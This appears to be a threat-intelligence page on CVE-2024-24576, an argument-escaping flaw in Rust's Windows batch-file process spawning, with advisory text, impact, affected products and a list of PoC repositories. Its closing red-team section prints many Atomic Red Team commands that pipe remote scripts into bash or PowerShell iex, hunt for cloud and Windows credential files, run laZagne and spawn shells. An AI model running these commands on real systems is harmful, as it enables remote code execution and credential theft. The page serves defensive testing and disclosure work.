CVE-2024-24576
Overview
This vulnerability is a command injection flaw arising from improper argument escaping in the Rust standard library's process spawning functionality on Windows. Specifically, the escaping logic for arguments passed to batch files (.bat and .cmd) via the Command API was insufficient, allowing crafted arguments to bypass intended escaping. The affected component is the Rust standard library's Command API implementation for Windows batch file invocation prior to version 1.77.2.
Vulnerability Description
Rust is a programming language. The Rust Security Response WG was notified that the Rust standard library prior to version 1.77.2 did not properly escape arguments when invoking batch files (with the `bat` and `cmd` extensions) on Windows using the `Command`. An attacker able to control the arguments passed to the spawned process could execute arbitrary shell commands by bypassing the escaping. The severity of this vulnerability is critical for those who invoke batch files on Windows with untrusted arguments. No other platform or use is affected. The `Command::arg` and `Command::args` APIs state in their documentation that the arguments will be passed to the spawned process as-is, regardless of the content of the arguments, and will not be evaluated by a shell. This means it should be safe to pass untrusted input as an argument. On Windows, the implementation of this is more complex than other platforms, because the Windows API only provides a single string containing all the arguments to the spawned process, and it's up to the spawned process to split them. Most programs use the standard C run-time argv, which in practice results in a mostly consistent way arguments are splitted. One exception though is `cmd.exe` (used among other things to execute batch files), which has its own argument splitting logic. That forces the standard library to implement custom escaping for arguments passed to batch files. Unfortunately it was reported that our escaping logic was not thorough enough, and it was possible to pass malicious arguments that would result in arbitrary shell execution. Due to the complexity of `cmd.exe`, we didn't identify a solution that would correctly escape arguments in all cases. To maintain our API guarantees, we improved the robustness of the escaping code, and changed the `Command` API to return an `InvalidInput` error when it cannot safely escape an argument. This error will be emitted when spawning the process. The fix is included in Rust 1.77.2. Note that the new escaping logic for batch files errs on the conservative side, and could reject valid arguments. Those who implement the escaping themselves or only handle trusted inputs on Windows can also use the `CommandExt::raw_arg` method to bypass the standard library's escaping logic.
Impact
An unauthenticated attacker able to supply arguments to processes spawned via Rust's Command API on Windows can execute arbitrary shell commands by exploiting the flawed escaping of batch file arguments. This results in full control over the spawned process execution context, potentially leading to complete system compromise. The vulnerability is critical (CVSS 10) with network attack vector (AV:N), no privileges required (PR:N), no user interaction (UI:N), and scope change (S:C), enabling high confidentiality, integrity, and availability impact.
Solution
Upgrade Rust to version 1.77.2 or later, where the escaping logic for Windows batch file arguments is improved and unsafe arguments cause an InvalidInput error. Refer to the Rust Security Advisory GHSA-q455-m56c-85mh for detailed patch information. For cases requiring custom escaping or trusted inputs, use the CommandExt::raw_arg method to bypass the standard escaping logic as documented in the official Rust standard library references.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in the Rust programming language's standard library arises from improper handling of arguments when invoking batch files on Windows systems. Specifically, the issue lies in the `Command` API, which is designed to pass arguments to spawned processes without evaluating them through a shell. However, on Windows, the unique behavior of `cmd.exe` complicates this process. Unlike other platforms, where argument passing is straightforward, Windows requires a custom parsing mechanism due to its distinct argument splitting logic. The inadequacy of the escaping mechanism in place allowed attackers to manipulate arguments, leading to the potential execution of arbitrary shell commands. This flaw underscores the complexities of cross-platform development and the critical need for thorough input validation.
Exploitation of this vulnerability can occur when an attacker is able to control the arguments passed to a command executed via the Rust standard library. For instance, if an application accepts user input to construct a command that invokes a batch file, an attacker could craft malicious input that bypasses the escaping logic, resulting in the execution of unintended commands. This scenario is particularly concerning in environments where untrusted input is processed, such as web applications or command-line tools that do not adequately sanitize user input. The potential for remote code execution elevates the risk significantly, as it could lead to full system compromise, data breaches, or unauthorized access to sensitive information.
The real-world impact of this vulnerability is substantial, especially for organizations that rely on Rust for developing secure applications. The critical severity rating indicates that successful exploitation could lead to severe consequences, including loss of data integrity, unauthorized access to systems, and potential financial losses. Businesses that utilize affected versions of Rust in their software stacks must assess their exposure to this vulnerability, particularly if they handle untrusted input. The implications extend beyond immediate technical concerns; they also encompass reputational damage and regulatory repercussions, especially in industries governed by strict compliance standards.
To detect and mitigate this vulnerability, organizations should prioritize upgrading to the fixed version of the Rust standard library, specifically version 1.77.2 or later. Regularly updating software dependencies is a fundamental practice in maintaining security hygiene. Additionally, developers should implement robust input validation and sanitization mechanisms to ensure that untrusted input is handled safely, regardless of the underlying libraries. For those who require more control over argument handling, utilizing the `CommandExt::raw_arg` method allows developers to bypass the standard library's escaping logic, albeit with an understanding of the associated risks. Continuous monitoring for unusual command executions and employing security tools that can detect anomalous behavior will further bolster defenses against potential exploitation.
In conclusion, the vulnerability within the Rust standard library highlights the intricate challenges of secure software development, particularly in a multi-platform context. The combination of improper argument handling and the complexities of the Windows command execution environment creates a critical risk that organizations must address proactively. By adopting comprehensive security practices, including timely updates and rigorous input validation, businesses can mitigate the risks associated with this vulnerability and enhance their overall security posture.
CSURFACE threat intelligence has detected a marked escalation in exploitation attempts targeting CVE-2024-24576, with new proof-of-concept exploits gaining traction across multiple public repositories. Our telemetry indicates that threat actors are increasingly leveraging these publicly available tools to craft attacks that bypass argument escaping in Windows batch file execution via Rust’s standard library. Although the EPSS score remains stable, the surge in detection activity signals a growing operational interest that elevates the risk profile for organizations relying on Rust versions prior to 1.77.2. This development underscores an urgent need for defenders to prioritize monitoring for anomalous command invocation patterns on Windows systems, as exploitation attempts are becoming more frequent and sophisticated. The expanding exploit landscape, combined with the critical severity of this vulnerability, amplifies the potential for impactful compromise in environments where untrusted input is passed to batch files through Rust’s Command interface.
Affected Products (4)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Fedoraproject | Fedora | 38 |
cpe:2.3:o:fedoraproject:fedora:38:*:*:*:*:*:*:*
|
|
|
Fedoraproject | Fedora | 39 |
cpe:2.3:o:fedoraproject:fedora:39:*:*:*:*:*:*:*
|
|
|
Fedoraproject | Fedora | 40 |
cpe:2.3:o:fedoraproject:fedora:40:*:*:*:*:*:*:*
|
|
|
Rust-Lang | Rust | All |
cpe:2.3:a:rust-lang:rust:*:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
GitHub PoCs (8)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
frostb1ten/CVE-2024-24576-PoC
Example of CVE-2024-24576 use case.
|
frostb1ten | 59 | 10 | 2024-04-09 | View |
|
aydinnyunus/CVE-2024-24576-Exploit
CVE-2024-24576 Proof of Concept
|
aydinnyunus | 20 | 4 | 2024-04-10 | View |
|
brains93/CVE-2024-24576-PoC-Python
|
brains93 | 9 | 3 | 2024-04-10 | View |
|
corysabol/batbadbut-demo
This is a simple demo for the BadBatBut vulnerability CVE-2024-24576
|
corysabol | 4 | 0 | 2024-04-12 | View |
|
lpn/CVE-2024-24576.jl
Simple CVE-2024-24576 PoC in Julia
|
lpn | 2 | 0 | 2024-04-14 | View |
|
foxoman/CVE-2024-24576-PoC---Nim
CVE-2024-24576 PoC for Nim Lang
|
foxoman | 1 | 0 | 2024-04-11 | View |
|
Gaurav1020/CVE-2024-24576-PoC-Rust
|
Gaurav1020 | 0 | 0 | 2024-04-20 | View |
|
SheL3G/CVE-2024-24576-PoC-BatBadBut
PoC for CVE-2024-24576 vulnerability "BatBadBut"
|
SheL3G | 0 | 0 | 2024-04-21 | View |
Threat Feed
4 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Proof-of-concept code is publicly available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-88 | OS Command Injection |
55%
|
High | High | |
| CAPEC-6 | Argument Injection |
48%
|
High | High | |
| CAPEC-43 | Exploiting Multiple Input Interpretation Layers |
48%
|
Medium | High |
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.